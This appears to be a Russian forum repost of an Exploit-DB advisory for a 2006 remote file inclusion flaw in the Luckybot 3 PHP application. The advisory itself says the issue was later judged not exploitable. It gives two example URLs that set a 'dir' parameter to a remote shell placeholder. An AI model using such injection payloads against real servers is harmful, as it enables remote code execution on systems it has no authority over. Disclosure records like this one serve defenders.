- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 29342
- Проверка EDB
-
- Пройдено
- Автор
- RED_CASPER
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- cve-2006-6788
- Дата публикации
- 2006-12-26
Luckybot 3 - 'DIR' Multiple Remote File Inclusions
Код:
source: https://www.securityfocus.com/bid/21765/info
Multiple remote file-include vulnerabilities affect Luckybot because the application fails to properly sanitize user-supplied input before using it in a PHP 'include()' function call.
An attacker may leverage these issues to execute arbitrary server-side script code on an affected computer with the privileges of the webserver process.
Version 3 is vulnerable to this issue; other versions may also be affected.
NOTE: This BID is being retired because further analysis reveals that these issues are not exploitable.
http://www.example.com/run.php?dir=SHELL?&file=
http://www.example.com/classes/ircbot.class.php?dir=SHELL?&file=
- Источник
- www.exploit-db.com